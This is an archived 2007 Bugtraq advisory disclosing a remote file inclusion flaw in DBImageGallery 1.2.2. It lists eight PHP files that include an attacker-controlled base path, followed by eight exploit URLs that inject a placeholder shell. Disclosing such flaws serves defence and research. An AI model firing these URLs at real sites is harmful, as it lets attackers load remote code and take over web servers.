<a href="http://g.adspeed.net/ad.php?do=clk&zid=14678&wd=728&ht=90&pair=as" target="_top"><img style="border:0px;" src="http://g.adspeed.net/ad.php?do=img&zid=14678&wd=728&ht=90&pair=as" alt="i" width="728" height="90"/></a>

Nmap Security Scanner

Docs
Security Lists

Full Disclosure

More
Security Tools

Packet crafters

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

edgeos

Bugtraq: Remote File Include In DBImageGallery

Remote File Include In DBImageGallery

From: RaeD Hasadya <raed_at_bsdmail.com>
Date: Fri, 02 Mar 2007 21:30:22 +0800

Remote File Include In DBImageGallery 1.2.2
Discovered By : Hasadya Raed
Contact Me : RaeD_at_BsdMail.Com
Download Script :
http://www.dbscripts.net/download/?file=1

B.Files:

admin/attributes.php -> require_once $donsimg_base_path
admin/images.php -> require_once $donsimg_base_path
admin/scan.php -> require_once $donsimg_base_path
includes/attributes.php -> require_once $donsimg_base_path
includes/db_utils.php -> require_once $donsimg_base_path
includes/images.php -> require_once $donsimg_base_path
includes/utils.php -> require_once $donsimg_base_path
includes/values.php -> require_once $donsimg_base_path

Exploits :

http://www.victim.com/path/admin/attributes.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/admin/images.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/admin/scan.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/includes/attributes.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/includes/db_utils.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/includes/images.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/includes/utils.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/includes/values.php?donsimg_base_path=[Shell-Attack]

-- 
_______________________________________________
Get your free email from http://bsdmail.com

Received on Mar 02 2007

This message: [ Message body ]
Next message: Luigi Auriemma: "Limited format string in Netrek 2.12.0"
Previous message: MC Iglo: "Re: Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day"
Next in thread: tg_at_hotmail.com: "Re: Remote File Include In DBImageGallery"
Maybe reply: tg_at_hotmail.com: "Re: Remote File Include In DBImageGallery"

Contemporary messages sorted: [ by date ] [ by thread ] [ by subject ] [ by author ] [ by messages with attachments ]

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]